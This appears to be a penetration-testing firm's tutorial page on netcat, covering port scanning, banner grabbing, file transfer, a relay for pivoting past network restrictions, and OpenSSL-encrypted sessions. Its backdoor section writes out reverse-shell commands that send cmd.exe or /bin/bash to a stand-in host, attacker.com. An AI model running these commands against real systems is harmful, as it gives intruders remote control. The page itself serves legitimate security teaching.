PARLAR

OFFENSIVE SECURITY - PENETRATION TESTING - RED TEAMING - ETHICAL HACKING

NETCAT: THE SWISS ARMY KNIFE OF NETWORKING

The ultimate networking utility in every hacker's toolkit

What is Netcat?

Netcat (nc) is a versatile networking utility for reading from and writing to network connections using TCP or UDP. It's designed to be a reliable back-end tool that can be used directly or driven by other programs and scripts.

$ nc -h [v1.10-46] connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [-options] [hostname] [port] options: -c shell commands as `-e'; use /bin/sh to exec [dangerous!!] -e filename program to exec after connect [dangerous!!] -b allow broadcasts -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this help message -i secs delay interval for lines sent, ports scanned // ...more options...

Key Features

+

Simple Port Scanning

Quickly check if specific ports are open on a target system.

nc -zv target.com 20-80
$ nc -zv target.com 20-80 target.com [192.168.1.1] 22 (ssh) open target.com [192.168.1.1] 80 (http) open
+

Banner Grabbing

Identify running services by capturing their banners.

nc -v target.com 22
+

File Transfer

Transfer files between systems without complex protocols.

Sender
Receiver
# Receiver: $ nc -l -p 1234 > received_file.txt # Sender: $ nc receiver.com 1234 < file_to_send.txt
+

Simple Chat Server

Create a basic chat server for text communication.

nc -l -p 1234    # Server
nc server.com 1234    # Client
# Server: $ nc -l -p 1234 Hello, is anyone there? # Client: $ nc server.com 1234 Hello, is anyone there? Yes, I can hear you clearly!
+

Backdoor / Reverse Shell

Create remote backdoor access to systems (for authorized penetration testing only).

# Listener:
nc -l -p 4444

# Target (Windows):
nc -e cmd.exe attacker.com 4444

# Target (Linux):
nc -e /bin/bash attacker.com 4444
# Attacker: $ nc -l -p 4444 whoami john_doe ls -la total 32 drwxr-xr-x 5 john_doe staff 160 Oct 3 14:22 . drwxr-xr-x 20 john_doe staff 640 Oct 3 11:15 .. -rw------- 1 john_doe staff 8517 Oct 3 14:21 .bash_history -rw-r--r-- 1 john_doe staff 220 Oct 3 10:05 .bash_logout

Advanced Netcat Techniques

+

Web Server Testing

Manually test a web server by crafting HTTP requests.

nc www.example.com 80
$ nc www.example.com 80 GET / HTTP/1.1 Host: www.example.com HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Mon, 03 Oct 2023 15:43:21 GMT Server: ECS (dcb/7F5B) Content-Length: 1256 Example Domain
+

Port Forwarding / Pivoting

Create a simple port relay to bypass network restrictions.

mkfifo /tmp/pipe
nc -l -p 8080 < /tmp/pipe | nc target.com 80 > /tmp/pipe

This creates a relay that forwards traffic from port 8080 on your machine to port 80 on target.com, allowing you to pivot through networks.

+

Encrypted Communication with Netcat

Use OpenSSL with netcat for encrypted communications.

# Server:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 4433

# Client:
openssl s_client -quiet -connect server.com:4433

Try It Yourself

Click the buttons below to see Netcat in action:

Click a button above to see a live demonstration...

Security Implications

While Netcat is an invaluable tool for legitimate security professionals, it's often flagged by antivirus software due to its potential for misuse. Always ensure you have proper authorisation before using Netcat on any system or network.

Need a Professional Pentest? Contact Us